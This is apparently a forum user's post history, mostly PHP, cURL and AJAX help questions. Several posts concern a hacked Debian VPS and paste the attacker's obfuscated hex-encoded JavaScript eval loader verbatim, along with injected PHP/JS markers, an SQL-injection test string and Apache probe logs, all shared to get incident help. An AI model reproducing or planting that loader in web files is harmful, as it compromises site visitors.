tommyboy123x

Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfusicated javascirpt code in the js files... this is becoming a serious problem. try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e85877e2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e85877e3c8180712e4b2e357682827e483d3d82738182403c767d818288773c717d7b3d777b753d44547085507c62523c7e767e3549182e85877e3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e85877e3c8182877a733c707d807273802e4b2e353e3549182e85877e3c8182877a733c7673777576822e4b2e35477e863549182e85877e3c8182877a733c85777282762e4b2e35457e863549182e85877e3c8182877a733c7a7374822e4b2e353f7e863549182e85877e3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363585877e3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3585877e6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363585877e35373c6f7e7e737c725176777a723685877e3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.

Could you elaborate? As far as I'm aware, there is no way to add an sql injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened? It is a debian squeeze environment.

It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple weeks when I do a complete analysis.

Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possiblities. Thanks!

I have this in my apache logs [Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config) In the access log I have this: 96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$ 77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$ Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?

I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file php is as follows: <? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?> and on all my javascript files: /*0f2490*/ document.write('<img src="http://localhost/" >'); /*0f2490*/ The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581 Was my server compromised? What steps can I take to ensure this doesn't happen again? Its on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem. Thanks!

Eureka! I found out you need to send something to the browser in order to check if it is still alive - I chose "echo chr(0);" but you can also use echo "\n"; from what I hear. Tom

I'm not sure what PHP considers an "aborted connection" and things like that, but the way this chat works is by updating a file and using the timestamp off it to determine if new posts exist. Rather than re-checking the server over and over, this code will check once and keep the connection open until a response is made. The only problem is, it works too well! Even after the tab is closed and I try another script on the site or the same script, it all hangs until I update the file - here is the code snippet: while (($currentmodif <= $lastmodif) && (connection_aborted() == 0) && (connection_status() == 0)){ // check if the data file has been modified usleep(10000); // sleep 10ms to unload the CPU if (connection_aborted ()) break; if (connection_status () != 0) break; clearstatcache(); $currentmodif = filemtime($filename); } I have put several measures in to attempt to break the loop when the user disconnects, but it just doesn't work! It will continue to hang and hang and hang until I re-upload the file $filename HOW CAN I BREAK THE WHILE LOOP WHEN THE MEMBER LEAVES THE PAGE? I could post up an example but its ultimately useless after one load unless you have control over updating the file. Thanks!

this might sound dumb, but shouldn't "<?=" be "<?" in the title? could you change that to "<?php" ?

Try unparsing the PHP code when the xampp code begins; One guess I have is that when the xampp code begins, it tries to start a new "<?php" when it has already been opened. I could tell you a little more if I saw the code / website

It would definitely start by naming variables what they should be. I've noticed that it makes things a lot harder once you look back at old code or even when you are debugging. I'm with zanus on this one. Can you explain a bit more of what is going on / what the script does? There must be more than 1 file, right?

I think hes just looking for an easy way to add a few thousand zip codes to a database I would just make a table with all the places / locations / cities in it you want, then assign zip codes. From there you can have a search that would look like SELECT * FROM zipcodes WHERE zip='$zipcode' ORDER BY location ASC good luck!

I know you said PHP posting was the easiest, but why not just use a simple flash based uploader? you can find tons of those scripts online. PHP isn't really designed to upload big files, unless i'm mistaken =\

bump?

well mysql is searching literally for '"8/07/%"'. instead what you want is '"8/07/"%', if that makes any sense? If you want to keep the date how it is formatted but search for only the first part of the date, you need to store date as $date = date ('y/m/'); then the query should look like SELECT * FROM `data` WHERE ... AND `data` LIKE '$date%' ORDER BY id DESC note you use of "LIKE" instead of "=", and the % wild card at the end of $date However, for a possibly more efficient way to keep records, store your data in the table as unix timestamps (number of seconds from December 31st 1969 12:00), and search for a date range that would correspond to the particular day you want to find (which in this case would be between 1216267200 and 1216353600). You can find some unix timestamp converters online, use time() to return a unix timestamp, date([FORMATTED DATE], [uNIX TIMESTAMP]) to reverse the process, etc. They are a lot easier to work with in the long run.

I'm not sure if I fully understand your database / table setup, however try using a different function $row = mysql_fetch_array($result); $text = "Article: dumm1 Length: $row['col_name_for_answer1'] Height: $row['col_name_for_answer2'] etc..."; hope it helps!

For some reason when I attempt to connect to the server to download the log file (it has get variables to specify the date range), it won't work Also, this code is extremely... "simplified" and yet so ugly $url = 'http://..../'; #an example URL $password = 'password'; $username = 'username'; filename = 'filename'; $file = 'csvuploads/'.$filename; $timestamp = time(); $em = date('n', $timestamp); #end month $ed = date('j', $timestamp); #end day $ey = date('Y', $timestamp); #end year $timestamp2 = $timestamp - 150000; $sm = date('n', $timestamp2); #etc... $sd = date('j', $timestamp2); $sy = date('Y', $timestamp2); $url0 = str_replace('{ey}',$ey,$url); $url1 = str_replace('{sm}',$sm,$url0); $url2 = str_replace('{sd}',$sd,$url1); $url3 = str_replace('{sy}',$sy,$url2); $url4 = str_replace('{em}',$em,$url3); $url = str_replace('{ed}',$ed,$url4); $ch = curl_init(); $handle = fopen($file, 'w+'); echo 'em: '.$em.'<br />ed: '.$ed.'<br />ey: '.$ey.'<br />sm: '.$sm.'<br />sd: '.$sd.'<br />sy: '.$sy.'<br />url: '.$url.'<br />username: '.$row['username'].'<br />password: '.$row['password'].'<br />'; curl_setopt($ch, CURLOPT_COOKIEJAR, "inc/cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "inc/cookies.txt"); //curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERPWD, $username.':'.$password); curl_setopt($ch, CURLOPT_FILE, $handle); if (!curl_exec($ch)){ echo 'An error has occured!<br />Code: 8523x8'; exit(); } curl_close($ch); It creates the file and can output the data, however it gets hung up on the curl_exec(), where it doesn't connect properly. It loads for about 30 seconds and then gives up. Any advice? Also, I've tried copy() with even less luck using https://username:password@domain.com/....etc.../. Help appreciated!

Topic solved. I didn't know cURL wouldn't just run, i thought it was almost the same as header(location:...); but with a little more options. thanks!

So far it doesn't seem to be working to use the send() to send something to an external server. here is what i have. function ajaxFunction(){ var ajaxRequest; try{ // Opera 8.0+, Firefox, Safari ajaxRequest = new XMLHttpRequest(); } catch (e){ // Internet Explorer Browsers try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ // Something went wrong alert("Your browser broke!"); return false; } } } ajaxRequest.open("GET", "http://mysite.com/tester.php?a=1&b=2&c=3", true); ajaxRequest.send(null); } ajaxFunction(); the script this is running on is not mysite.com. Should this be working even though it is on an outside server?

as promised echo '<script type="text/javascript"> function ajaxFunction(){ var ajaxRequest; try{ // Opera 8.0+, Firefox, Safari ajaxRequest = new XMLHttpRequest(); } catch (e){ // Internet Explorer Browsers try{ ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try{ ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ // Something went wrong alert("Your browser broke!"); return false; } } } ajaxRequest.open("GET", "http://mysite.com/test.php?a=1&b=2", true); ajaxRequest.send(null); } ajaxFunction(); </script>'; all i needed it to do was drop off the info and die, so this worked out perfectly. chrisdburns, pls check ur inbox

AJAX!! why didn't i think of that?! I'll post up some code once i have it done. THANK YOU, you are a life saver!

I know i can send it but how do i send the get variables without leaving the script?

All i want to do is send URL GET data without going to the site. so, mysite.com wants to inform theirsite.org [and several others] that something has happened. It uses a cronjob to check every few minutes for this event and then when necessary, it will inform theirsite.org by sending a GET variable (http://theirsite.org/page.php?foo=bar). but it still has a few more sites to inform. How can i do this? I already left mysite.com so the script has terminated.

no they would be people who signed up. i have no control over their scripts or anything... and it would have to be GET, not POST. would it be possible to do it with frames? have one frame on the script and the other loading the pages?

i need to send multiple (as in hundreds) of get variables to different websites. I want to send them the data, but I do not want to visit their site / have the browser actually go there. Would this make any sense / am i on the right track? $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.mysite.com/page.php?getvar1=true&getvar2=false"); curl_exec ($ch); or is there an easier way that i'm simply not seeing?